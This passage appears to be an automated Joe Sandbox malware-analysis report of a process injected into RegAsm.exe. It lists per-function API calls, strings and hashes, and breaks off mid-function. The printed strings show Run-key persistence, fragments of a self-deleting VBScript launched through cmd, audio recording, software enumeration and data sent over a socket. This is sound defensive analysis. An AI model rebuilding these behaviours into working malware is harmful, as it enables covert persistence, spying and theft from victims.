Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
exepath, xrefs: 0040D4F7
8SG, xrefs: 0040D4CF
Temp, xrefs: 0040D580
On Error Resume Next, xrefs: 0040D5B9
wend, xrefs: 0040D689
""", 0, xrefs: 0040D6E7
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
fso.DeleteFile ", xrefs: 0040D63A
open, xrefs: 0040D7BE
while fso.FileExists(", xrefs: 0040D5EC
0qF, xrefs: 0040D78C, 0040D797
fso.DeleteFolder ", xrefs: 0040D6AB
"), xrefs: 0040D5D5
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
\update.vbs, xrefs: 0040D57B
dMG, xrefs: 0040D45B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: 64e9451259e9f8cd002c896d781d8ae298736b093be2333062e70947a8b22da4
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: 64e9451259e9f8cd002c896d781d8ae298736b093be2333062e70947a8b22da4
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65951986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
exepath, xrefs: 0040D181
Temp, xrefs: 0040D246
On Error Resume Next, xrefs: 0040D294
wend, xrefs: 0040D364
fso.DeleteFile ", xrefs: 0040D315
open, xrefs: 0040D40C
.vbs, xrefs: 0040D201
dMG, xrefs: 0040D0D1
while fso.FileExists(", xrefs: 0040D2C8
hpF, xrefs: 0040D38F
8SG, xrefs: 0040D15E
fso.DeleteFolder ", xrefs: 0040D38A
"), xrefs: 0040D2B1
pth_unenc, xrefs: 0040D09C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: bceadcf7fb1dd9a7bd66049defdd3cb4f86d9d3ae6a6c166cb79ba2f2b592296
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: bceadcf7fb1dd9a7bd66049defdd3cb4f86d9d3ae6a6c166cb79ba2f2b592296
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32 ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

8SG, xrefs: 004124A6
WDH, xrefs: 00412548, 004126B6
exepath, xrefs: 004124CC
temp_, xrefs: 004125E3
.exe, xrefs: 004125F5
open, xrefs: 0041263B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 571e448b96f66f9211ace9dafb791117dff199a534b40e43b66961fe3feffba2
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 571e448b96f66f9211ace9dafb791117dff199a534b40e43b66961fe3feffba2
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

" type , xrefs: 0041B0D5
stop audio, xrefs: 0041B257
status audio mode, xrefs: 0041B1F7
stopped, xrefs: 0041B202
resume audio, xrefs: 0041B1E2
NG, xrefs: 0041B109, 0041B08B
play audio, xrefs: 0041B14B
open ", xrefs: 0041B0D0
close audio, xrefs: 0041B261
pause audio, xrefs: 0041B1CA
alias audio, xrefs: 0041B0B8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

RIFF, xrefs: 00401AFD
fmt , xrefs: 00401B2D
WAVE, xrefs: 00401B1D
data, xrefs: 00401BB1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407271
NtAllocateVirtualMemory, xrefs: 0040729C
RtlReleasePebLock, xrefs: 004072D8
NtFreeVirtualMemory, xrefs: 004072B0
LdrEnumerateLoadedModules, xrefs: 004072EC
RtlAcquirePebLock, xrefs: 004072C4
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
RtlInitUnicodeString, xrefs: 0040727E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-351152038
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32 ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32 ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32 ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB
6, xrefs: 0040CEDA
del, xrefs: 0040CFF5
open, xrefs: 0040D044

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
API String ID: 1579085052-545640883
Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32 ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32 ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32 ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65951986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
0TG, xrefs: 00413026
NG, xrefs: 004130C1
NG, xrefs: 00412F6C
0TG, xrefs: 0041314C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 8e338586697e4724e08d117bd8d3faf493e970ab47327ace452d08935691f8ff
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: 8e338586697e4724e08d117bd8d3faf493e970ab47327ace452d08935691f8ff
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID:
API String ID: 1464849758-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Uniqueness

Uniqueness Score: -1.00%

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

InstallDate, xrefs: 0041C790
DisplayVersion, xrefs: 0041C768
InstallLocation, xrefs: 0041C77C
UninstallString, xrefs: 0041C7A4
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
DisplayName, xrefs: 0041C73C
Publisher, xrefs: 0041C751

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
